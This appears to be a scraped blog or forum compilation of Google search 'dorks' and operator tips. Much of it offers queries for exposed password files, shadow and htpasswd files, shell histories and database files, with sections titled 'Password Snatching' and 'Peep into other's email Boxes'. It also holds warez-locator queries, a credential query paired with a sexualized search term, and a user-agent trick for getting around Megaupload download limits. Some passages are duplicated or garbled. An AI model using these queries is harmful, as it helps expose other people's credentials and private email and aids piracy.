intitle:"index.of.personal"
Directory may contain sensitive information
intitle:"Index of" login.jsp
The login.jsp file may contain database username or password information
intitle:"Index of" logfile
Directory may contain sensitive log files
filetype:php inurl:"viewfile" -"index.php" -"idfil
File may contain PHP source code
allinurl:intranet admin
"index of/root"
"auth_user_file.txt"
"index of/root"
"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype oc
allintitle: restricted filetype :mail
allintitle: restricted filetype oc site:gov
allinurl: winnt/systpem32/
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
INTITLE - search for string in title
intitle:"michael moore"
ALLINTITLE - search strings in title
allintitle:"michael moore" films
INURL - search for string in the url
inurl:"michael moore"
INTEXT - search for the string in the site body
intext:"angry white men"
SITE - search specific domains
"virus" site:infosec.navy.mil
LINK - locate sites linking to the site entered
link:www.pogo.com
CACHE - search google site cache
cache:www.whitehouse.gov
DATERANGE - search within a date range (julian)
"michael moore" daterange:2452389-2452389
FILETYPE - locate files (don't list any html pages, just the files)
"economic disaster" filetype:pdf -filetype:htm -filetype:html
RELATED - locate pages that are related (similar)
related:www.usatoday.com
INFO - locates links about site
info:www.2600.com
PHONEBOOK - locates phone numbers
phonebook:"fred stanley"
STOCKS - stock info
stocks:msft
BOOLEAN LOGIC
- "AND", "I", "a", "The", and "Of" are ignored
- a pipe "|" is treated as "OR"
- a minus symbol "-" eliminates the string from results
- wildcard "*" can be used on words, not characters
("three * mice" = "three blind mice")
- 10 word limit. Use wildcards like "do as * say not as * do"
Triggers and Switches
- ! = Initializes the "I'm Feeling Lucky" search option
intitle:"Directory of" sexually transmitted diseases -inurl:book -inurl:products
- ?? = searches the google directory
?? "michael moore"
- , = searches usenet database (google groups)
, group:sci.med* hiv
/images = searches google images
intitle:cheerleaders -filetype:htm -filetype:html /images
/news = searches google news
intitle:"saddam hussein" /news
/since = days ago
"george bush" /since:365
Google URLs
The query "three blind mice" returns
http://www.google.com/search?num=100&hl=en&q=%22three+blind+mice%22&as_qdr=m6&safe=off
query = q=%22three+blind+mice%22&as_qdr=m6&safe=off
num = number of results (1-100)
as_qdr=mx =specifies age of site (x= amount of months)
safe=off =content filter (on or off)
The Good Stuff
1. Vulnerable Servers (Mic*ft Based)
http://www.google.com/search?num=100&hl=en&safe=off&q=intitle%3A%22index+of+%2F%22+%22parent+directory%22+intitle%3A%22mp3%22+-filetype%3Ahtm+-filetype%3Ahtml
Runs this Query
intitle:"index of /" "parent directory" intitle:"mp3" -filetype:htm -filetype:html
DESCRIPTION : searches for misconfigured web-servers with an open "/" root path and a folder named MP3s
2. Vulnerable Apache Servers (UNIX Based)
http://www.google.com/search?num=100&hl=en%safe=off&q=%2B%22index+%2Bof%2Fmp3%22+%2Bbeatles
Runs this Query
+"index +of/mp3" +beatles
DESCRIPTION : searches for misconfigured paths containing mp3s
3. Password Snatching
http://www.google.com/search?hl=en&as_qdr=all&q=%22http%3A%2F%2Fbob%3Abob%40www%22&btnG=Google+Search
Runs this Query
"http://bob:bob@www" or "http://12345:54321@www"
DESCRIPTION : Searches for password files people save on their hard drives
4. Locate specific site info and passes
http://www.google.com/search?hl=en&q=%22http%3A%2F%2F%2A%3A%2A%40www%22+teenagepanties&btnG=Google+Search
Runs this Query
"http://*:*@www" teenagepanties
5. Warez locator Queries
http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=intitle%3A%22index+of+%2F%22+%22parent+directory%22+%2B%22%2A.nfo%22+%2B%22%2A.rar%22+%2B%22%2A.r05%22+%2B%22%2A.r10%22+-filetype%3Ahtm+-filetype%3Ahtml&btnG=Google+Search
Runs this Query
intitle:"index of /" "parent directory" +"*.nfo" +"*.rar" +"*.r05" +"*.r10" -filetype:htm -filetype:html
intitle:"paris hilton"+"index of " +"parent directory" +"mpg" -filetype:htm -filetype:html
Google is Dangerous. Peep into other's email BoxesGoogle is Dangerous. Peep into other's email Boxes
0 Comments Published by Proud Marathi on at 6:32 PM.
Google is Dangerous. Peep into other's email Boxes.
Other emails can be searched by Google. Yes, you can peep on it.
The idea is, one Google advanced search string is filetype: . It is used to find out any file only. Now I'm using this string as a tool,
I am searching for filetype:eml eml intext:"Content-Type: image/jpeg".
Look at the keyword. It is finding a file with extension eml and that eml should have a Line Content-Type: image/jpeg. Now remember the old days, MIME encoding of a email. When ever we are attaching a .jpg file, that line should come in .eml file. So, the full keyword is searching for filename any with extension .eml which is email file extension, and it should contain a .jpg file, may be some photo or other picture from the web. You can't belive if you are not checking it yourself.
Keyword :
Other emails can be searched by Google. Yes, you can peep on it.
The idea is, one Google advanced search string is filetype: . It is used to find out any file only. Now I'm using this string as a tool,
I am searching for filetype:eml eml intext:"Content-Type: image/jpeg".
Look at the keyword. It is finding a file with extension eml and that eml should have a Line Content-Type: image/jpeg. Now remember the old days, MIME encoding of a email. When ever we are attaching a .jpg file, that line should come in .eml file. So, the full keyword is searching for filename any with extension .eml which is email file extension, and it should contain a .jpg file, may be some photo or other picture from the web. You can't belive if you are not checking it yourself.
Keyword :
| Code: |
| filetype:eml eml intext:"Content-Type: image/jpeg" |
For Firefox:
* First go to
* Click Install Now to install addon.
* Restart FF. Tool-->User Agent Switcher--->Options--->Options
* Click User Agents--->Add
* Type this:
+ Description: MEGAUPLOAD
+ User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar)
* Click OK twice to finish adding User Agent.
From now, before downloading any file on megaupload just go Tools--> User Agent Switcher--->MEGAUPLOAD.
Now U can download from megaupload without error : "All download slots (..) assigned to your country (....) are in use".
* First go to
| Code: |
| https://addons.mozilla.org/firefox/59/ |
* Click Install Now to install addon.
* Restart FF. Tool-->User Agent Switcher--->Options--->Options
* Click User Agents--->Add
* Type this:
+ Description: MEGAUPLOAD
+ User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar)
* Click OK twice to finish adding User Agent.
From now, before downloading any file on megaupload just go Tools--> User Agent Switcher--->MEGAUPLOAD.
 | Quote: |
| For IE: * Start/run->> type regedit -> ok * Go to: [HKEY_LOCAL_MACHINE\SOFTWARE\Mic*ft\Wi ndows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform] Note: if U use IE 7 go to: [HKEY_LOCAL_MACHINE\SOFTWARE\Mic*ft\Wi ndows\CurrentVersion\Internet Settings\User Agent\Post Platform] * Right click on Post Platform > New > String Value > type Alexa Toolbar > ok |
Now U can download from megaupload without error : "All download slots (..) assigned to your country (....) are in use".
| Quote: |
| U can even use a download manager such as IDM (Internet Download Manager) for downloading through megaupload |
